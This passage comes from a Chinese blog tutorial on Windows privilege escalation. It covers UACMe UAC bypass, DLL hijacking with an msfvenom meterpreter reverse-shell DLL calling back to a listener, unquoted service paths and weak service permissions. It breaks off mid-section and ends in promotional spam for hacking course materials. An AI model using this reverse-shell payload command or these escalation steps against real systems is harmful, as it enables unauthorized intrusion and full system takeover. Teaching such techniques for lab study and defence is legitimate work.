Windows权限提升—BypassUAC、DLL劫持(1),2024年最新网络安全高级进阶学习资料

于 2024-04-10 13:53:19 发布
阅读量482 收藏 5
点赞数 3
分类专栏: 2024年程序员学习 文章标签: windows web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84185106/article/details/137594126
版权

这里能够看到是成功提权了。

在这里插入图片描述

2.3. UACMe工具绕过UAC

这里我就不搭建WEB环境了,UACMe提取可以在低权限的时候提权,但是同样在UAC设置为高的时候同样也是无法进行直接提权的,需要人为的去点击确定才可以。

UACMe工具涵盖了Windows7-11以及server服务器系统均可以提权。

同时这里我就演示个Windows10系统的,至于Windows7肯定要比Windows10好提权。

2.3.1. 下载链接

注意想要使用这个工具需要对其进行编译成功.exe文件,而我这里没有最新的.exe文件,这里给个老版的,但是也没差到哪里去,具体使用的介绍建议去GitHub上自己看。

UACMe

百度网盘UACMe 提取码:86lm

2.3.2. Windows10系统案例

这里在下载完UACMe的时候,里面会有两个exe执行文件,一个是32位的,一个是64位的,按照不同的系统位数,放入不同的exe文件进行执行。

2.3.2.1. 系统内操作

注意这里弹出的窗口只是演示,在实际的环境中,我们无法登录桌面,可以使用改工具去运行木马后门,让其上线即可。

至于编号,新版的UACMe里包含70余种,可以一个一个尝试。

语法:Akagi64.exe 编号

在这里插入图片描述

2.3.2.2. 反弹上线

这里同样我们监听一下端口,并且利用工具进行反弹上线。

语法:Akagi64.exe 编号 后门程序地址

在这里插入图片描述

2.3.2.3. 查看权限

这里反弹上来的可能还是普通管理员权限,这里可以使用getsystem进行再次提权,可以看到成功提权。

在这里插入图片描述

3. dll劫持提权

3.1. Windows10系统案例

Windows 程序启动的时候需要 DLL。如果这些 DLL 不存在,则可以通过在应用程序要查找的位置放置恶意 DLL 来提权。通常,Windows 应用程序有其预定义好的搜索 DLL 的路径。

它会根据下面的顺序进行搜索:

1、应用程序加载的目录
2、C:\Windows\System32
3、C:\Windows\System
4、C:\Windows
5、当前工作目录 Current Working Directory,CWD
6、在 PATH 环境变量的目录(先系统后用户)

程序运行一般会加载系统dll或本身程序自带的dll,如果我们将程序执行时需要加载的dll文件替换成程序,那么我们下次在启动程序时所加载的dll就是我们替换的那个木马程序了。

3.1.1. 收集进程加载的dll

这里会出现一个问题,没有远程桌面我们如何收集,这里其实有个很简单的办法就是,通过上线普通木马后,看看能不能查看有存在哪些服务,然后找到相关服务本地安装,安装后使用火绒剑等工具进行查找加载的dll文件即可。

像系统文件加载的dll我们是动不了的,我们一般能懂的都是未知文件和数字签名文件。

在这里插入图片描述

3.1.2. MSF制作dll木马

这里我们选中libeay32.dll文件,我们就制作这个木马。

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.20 lport=5566 -f dll >libeay32.dll

在这里插入图片描述

3.1.3. 替换dll文件

这里将生成的dll文件替换原本的dll。

在这里插入图片描述

3.1.4. 运行软件

运行软件,不过需要注意的是,在实际环境中由于我未获取到桌面权限,所以需要等待管理员去运行,同时由于我们替换了dll文件,所以会导致管理员在运行软件的时候会出现无响应的情况,这时无法保证,管理员会卸载重新安装。

在这里插入图片描述

3.1.5. 设置监听

这里设置监听,当管理员去运行软件的时候就会上线,像上面提到的,当软件不能用了,无法保证管理员不会卸载重装或者重启电脑,所以在获取权限后需要及时的移植到其它进程上面。

可以看到的是成功上线了。

在这里插入图片描述

3.1.6. 提权

我这里没有提权成功,可能是由于系统问题,但是调试了半天也没成功,这也能够证明不是所有提权方式都是能够百分比提权成功的,这里也只是演示,可以用这个方式进行提权。

在这里插入图片描述

3.2. Windows2012系统案例

前面的分析与劫持等步骤就不在赘述了,直接看案效果把。

可以看到这里使用Windows2012就能够成功提权,所以之前提到的有些提权方式是根据不同系统可能有不同的效果。

在这里插入图片描述

4. 不带引号服务路径配合

注意提权方式和操作系统版本等都没有任何关系。

当Windows服务运行时,会发生以下两种情况之一。如果给出了可执行路径,并且引用了完整路径,则系统会按字面解释它并执行。但是,如果服务的二进制路径未包含在引号中,则操作系统将会执行找到的空格分隔的服务路径的第一个实例。

不过这个确实局限性还是很大的,比如虚拟机中没有找到这样的情况,实体机没有找到,客户现场机器也没找到…同时还有一个问题是就算有,很多都是在C盘中,如果基本权限不够大,那么也凉凉,也用不了。

4.1. 介绍案例

这里的图片我借用一下其它博客的,由于我自己电脑以及其它电脑,虚拟机都没有这样的路径。

次序执行
c:\program.exe
c:\program files.exe
c:\program files (x86)\grasssoft\macro.exe
c:\program files (x86)\grasssoft\macro expert\MacroService.exe

在这里插入图片描述

4.2. 查看系统中错误配置的路径

而通过下面的语句可以判断系统中是否存在这类问题,这里找到不代表就一定会存在问题,你看下面的图片明显无法进行替换。

wmic service get name,displayname,pathname,startmode |findstr /i “Auto” |findstr /i /v “C:\Windows\” |findstr /i /v “”"

在这里插入图片描述

4.3. 生成木马

这里由于我的虚拟机中并没有这样的路径,而且不好模拟,所以这里主要就是将一下流程,我们就按照第一张图片上的案例来演示。

c:\program files (x86)\grasssoft\macro expert\MacroService.exe ##获取到存在问题的路径

上面是获取到的错误路径,这里我们可以看到空格是在c:\program后面,那么我们生成一个木马,然后将木马名字改为:program.exe,并且发入C盘的根目录下。

这里放入C盘的原因是,服务去进行重启的时候,会按照上面的路径去寻找,而第一步就是找到C盘,同时又没有引号,那么当遇到program.exe的时候就会执行。

在这里插入图片描述

4.4. 重启服务

这里只需要让服务重启就可以了,不过这里同时遇到一个问题就是,当实际环境中是需要管理员去重启服务,或者重启服务器的时候启动,这样才能上线,不过一般这个上线就是system权限。

这里我就不演示了,主要没有那个条件,整体的流程就是这样的。

5. 不安全的服务权限

Windows服务有时被配置为与服务本身或与服务运行的目录相关的弱权限。这可能允许攻击者操纵服务,以便在其启动时执行任意代码,并将权限提升到SYSTEM。

5.1. 利用方式

将服务的 binpath 更改为我们上传的木马文件路径,以便在服务启动时执行恶意代码从而获得system权限,这里可以利用accesschk.exe工具辅助实现。

accesschk是一个windows系统配置检查工具,用于查看文件、注册表项、服务、进程、内核对象等的有效权限。该工具将有助于识别当前用户是否可以修改某个服务目录中的文件,由于它是微软官方出品,我们将其上传至靶机,执行不会受到阻碍。

5.1.1. 下载链接

accesschk.exe

5.2. 检查服务权限

这里将下载下来的工具上传至靶机中,这里我使用Windows server2012做演示。这里我为了测试方便,直接在靶机中去操作,而实际环境中可能需要在webshell工具中去操作。

5.2.1. 绕过许可

自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。

深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!

因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。
img
img
img
img
img
img

既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点,真正体系化!

由于文件比较大,这里只是将部分目录大纲截图出来,每个节点里面都包含大厂面经、学习笔记、源码讲义、实战项目、讲解视频,并且后续会持续更新

如果你觉得这些内容对你有帮助,可以添加VX:vip204888 (备注网络安全获取)
img

给大家的福利

零基础入门

对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。

同时每个成长路线对应的板块都有配套的视频提供:

在这里插入图片描述

因篇幅有限,仅展示部分资料

网络安全面试题

绿盟护网行动

还有大家最喜欢的黑客技术

网络安全源码合集+工具包

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
img

nvert/5072ce807750c7ec721c2501c29cb7d5.png)

所有资料共282G,朋友们如果有需要全套《网络安全入门+黑客进阶学习资源包》,可以扫描下方二维码领取(如遇扫码问题,可以在评论区留言领取哦)~

一个人可以走的很快,但一群人才能走的更远。不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎扫码加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
[外链图片转存中…(img-cb9oRGoJ-1712728385609)]

2401_84185106
关注
  • 3
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
UACME - uac by pass工具,已编译版本。
03-22
UACME - uac by pass工具,已编译版本。可以直接使用。 项目源代码 、使用说明参考 https://github.com/hfiref0x/UACME 未对代码行任何修改,直接行了编译。 经测试好用。 版本 v 3.5.9
渗透工具UACMe:滥用内置的Windows AutoElevate后门
学习、分享、交流
04-23 4491
通过滥用内置的Windows AutoElevate后门来击败Windows用户帐户控制。
Windows权限提升BypassUACDLL劫持(1),网络安全面试基础知识
m0_60607927的博客
04-08 226
这里的图片我借用一下其它博客的,由于我自己电脑以及其它电脑,虚拟机都没有这样的路径。次序执行。
权限提升-Windows提权】-UAC提权之MSF模块和UACME项目-DLL劫持-不带引号服务路径-不安全的服务权限
xiaoheizi的博客
09-01 2114
1、具体有哪些权限需要我们了解掌握的?后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等2、以上常见权限获取方法简要归类说明?后台权限:SQL注入数据库备份泄露,默认或弱口令等获取帐号密码入网站权限:后台提升至网站权限,RCE或文件操作类、反序列化等漏洞直达Shell数据库权限:SQL注入数据库备份泄露,默认或弱口令等入或网站权限获取后转入接口权限:SQL注入数据库备份泄露,源码泄漏,培植不当等或网站权限获取后转入。
windows提权总结
m0_52329625的博客
01-08 1162
自己总结学习的一些Windows提权思路,借鉴了许多网上公开的教程思路总结的一篇文章
Windows提权姿势总结
qq_53138792的博客
04-02 5120
1、ByPassUAC ByPassUAC 的方法一般有利用系统白名单程序、COM接口以及利用 Windows 自身漏洞等方式。 常见工具有 PowerShell 版的 Yamabiko 和需要自己编译的 C 语言版的 UACME 等,UACME 目前已经支持了72 种 ByPassUAC 的方法。 UACME 项目地址: https://github.com/hfiref0x/UACME.git 克隆 UACME 项目到本地后,使用 VS2019 行编译,然后运行即可。 例如以下命令,表示使
第62天:权限提升-烂土豆&dll劫持&引号路径&服务权限1
08-03
本文将深入探讨四种常见的提权技术:烂土豆、DLL劫持、不带引号的服务路径以及不安全的服务权限配置,并通过具体案例来解析这些技术的工作原理和利用过程。 首先,烂土豆是一种Windows权限提升漏洞,它允许攻击者...
DLLjiechi.zip_delphi 网络_dll_dll劫持_挟持源码
09-22
DLL劫持技术详解——基于Delphi的实战分析》 ...通过对源码的分析,我们可以学习到如何防止和检测DLL劫持,从而提升软件的安全性。在实际的软件开发中,我们应该重视对DLL劫持的防范,确保用户的数据和系统安全。
DccwBypassUACWindows 8.1和10 UAC绕过“ dccw.exe”中的WinSxS
02-06
这一技术涉及到Windows编程、DLL劫持和安全漏洞利用等多个方面,对于安全研究者和防御者来说具有极高的学习价值。 首先,我们要理解UAC的作用。UAC是Windows操作系统中的一个重要安全机制,旨在防止未经授权的更改...
dll劫持工具.zip
10-05
DLL劫持DLL Hijacking)是一种在Windows操作系统中利用动态链接库加载机制的安全漏洞行攻击的技术。DLL文件是Windows系统和应用程序中广泛使用的组件,它们包含可重用的代码和数据,供多个程序共享。当一个程序...
Window权限维持(十):Netsh_Helper_DLL1
08-03
Netsh是Windows实用程序,管理员可以使用它来执行与系统的网络配置有关的任务,并在基于主机的Windows防火墙上行修改。msfvenom -a x6
UACME:击败Windows用户帐户控制
01-31
UACME:击败Windows用户帐户控制
支持system权限,NSudo 6.2 windows下任意权限提权工具
01-10
适用于windowsNT内核的权限提取工具,支持System级,administrator,TrustedInstaller等特殊权限提权,提供GUI界面+命令行调用方式。支持32位64位,win7/8/8.1/10/2008r2/server2012/server2012r2/server2016/server2019
windows下的 Nsudo提权工具,支持system权限
02-05
类似Linux下的 sudo 命令的一款windows下工具,支持任意权限提权和令牌,包括system账户,附带命令行工具和源代码
windows提权工具
01-15
可以对win2K3-win2012 server行提权 win7也可以,win10没试过
Windows,Linux等系统提权工具
01-20
系统提权
Windows 提权
qq_53742230的博客
07-15 3556
Windows 一些提权手法总结
【UACME】在Win11上的发展
溡漪幽博客
01-14 566
(1)在Win11(22H2 22621.1105最新发布版)上,有些方法已经被修复,现在还能够在裸机上绕过UAC的方法序号为:33 41 43 53 59 61 62 70 73。在AV机器上,COM组件提权会被AV的Hook拦截,绕过方法为:被闲置的COM组件调用在恢复时会被过滤掉,***;注册表修改绕过UAC也会被AV查杀,绕过注册表监控的方法就是****。方法:在操作前关闭资源管理器,这个消息不是由安全与维护(操作中心)发出的,而是explorer自身发出的。
Windows提权辅助工具
LuckySec
04-24 965
0x01 工具介绍 该在线提权辅助工具收录了微软所有Windows权限提升以及命令执行资料,并实时更新,并且可以根据systeminfo信息找到未修补的漏洞和已经修补漏洞。 在线工具地址:https://i.hacking8.com/tiquan 0x02 工具使用 首先搜集Windows系统的补丁号或者systeminfo信息 然后将其systeminfo内容复制到在线辅助工具文本栏里 等待查询结果,即可看到目标系统可能存在的提权漏洞相关信息 ...
windows server 2008 api-ms-win-core-path-l1-1-0.dll
最新发布
05-21
api-ms-win-core-path-l1-1-0.dllWindows操作系统的一部分,它包含了一组用于路径处理的API函数。这些函数可以用于文件路径、目录路径、环境变量等方面的操作。例如,它包括了获取当前目录、获取指定路径的完整路径、创建目录、删除目录等操作。Windows Server 2008是一款服务器操作系统,它包含了大量的API函数,可以用于实现各种系统级别的功能。api-ms-win-core-path-l1-1-0.dll就是其中之一。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值